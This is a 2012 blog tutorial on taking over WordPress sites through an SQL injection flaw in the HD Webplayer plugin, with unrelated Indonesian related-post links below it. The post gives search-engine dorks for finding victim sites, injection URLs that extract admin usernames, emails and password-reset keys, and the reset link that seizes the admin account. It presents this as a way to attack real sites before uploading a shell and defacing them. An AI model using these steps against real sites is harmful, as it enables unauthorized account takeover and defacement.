Wednesday, October 10, 2012

Home » » How to hack wordpress website with Sqli vul.+ shell upload+ deface

How to hack wordpress website with Sqli vul.+ shell upload+ deface

8:06:00 AM    No comments

As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.
watch this video tutorial for more help:

<iframe width="640" height="360" src="http://www.youtube.com/embed/C5VKrCLEEM4?feature=player_embedded" frameborder="0" allowfullscreen></iframe>

So lets begin.
I will use this 0day by JoinSeventh.

First of all we need to find a vulnerable page.
We enter this in Google:
Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

When you found your site you need to find admin email and username.
I will be using this site for example:
Code:
http://www.website.com/wp-content/plugin...?videoid=3


When i add ' text disappears so it is vulnerable.

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:
Code:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3Cool,5,6,7,8,9,10,11 FROM wp_users--

Now we have 2 users.

We pick one and copy his email.
Go to the login page of the site.
It is usually here:
Code:
http://www.site.com/wp-login.php

And press "Lost your password?"

Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.



Now when you got:

"Check your e-mail for the confirmation link."

It means that reset key is successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:
Code:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3Cool,5,6,7,8,9,10,11 FROM wp_users--


Code:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3Cool,5,6,7,8,9,10,11 FROM wp_users--

Voila!
Now we just need to reset it.

Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=username

NOTE: Replace key= & login=

So my link will be:

Enter new password:

Login with new password and shell it.



NOTICE: BAGI YG KESULITAN BAHASANYA BISA GUNAKAN http://translate.google.co.id/?hl=id&tab=wT
SEKIAN.

Related Posts:

  • 10 Cara Jitu Menembak Cewe1. Kenali terlebih dahulu teman temanya2. Cari tau semua tentang dia3. Buatlah Puisi Romantis4. Jangan PDKT pada sekaligus pada 2 cewek5. Selalu Gaya setiap ketemu dia6. Usahakanlah anda selalu didekat nya, menemaninya7. Jang… Read More
  • 10 Pemain Sepakbola Terbaik, Terpantas di Dunia 2012Ini adalah Susunan Pemain Terbaik di Dunia versi Kini Dunia Ada di Dalam Blog1. Cristiano Ronaldo ( Real Madrid )Prestasi : Juara La Liga, Semifinalis Euro 2012, Pemain Terbaik Portugal 20122. Lionel Andres Messi ( Barcelona … Read More
  • 10 Tim Sepakbola Tersukses , Terkaya, Terelit Sepanjang Masa1. Real MadridLegenda: Alfredo Di Stefano,Raul, Ferenc PuskasGelar: 31 La Liga, 17 Copa delRey, 8 Supercopa Spanyol, 9Champions League, 1 Piala SuperEropa, 2 Europa League dan 3 Piala Dunia Antarklub.Bintang: Cristiano Ronald… Read More
  • 10 Tempat Paling Misterius & Misteri di Bumi 10. Piramida di Garut Indonesia punya piramida?Ya, letaknya di Gunung Sadahurip, Desa Sukahurip, Kec.Pangatikan, Kabupaten Garut, Jawa Barat. (tepat di tanah kelahiran khabuka,hanya berbeda Desa :-)).Keberadaa… Read More
  • Kenapa disebut Polisi Tidur ??Polisi tidur atau disebut juga sebagai Alat Pembatas Kecepatan adalah bagian jalan yang ditinggikan berupa tambahan aspal atau semen yang dipasang melintang di jalan untuk pertanda… Read More

0 komentar:

Post a Comment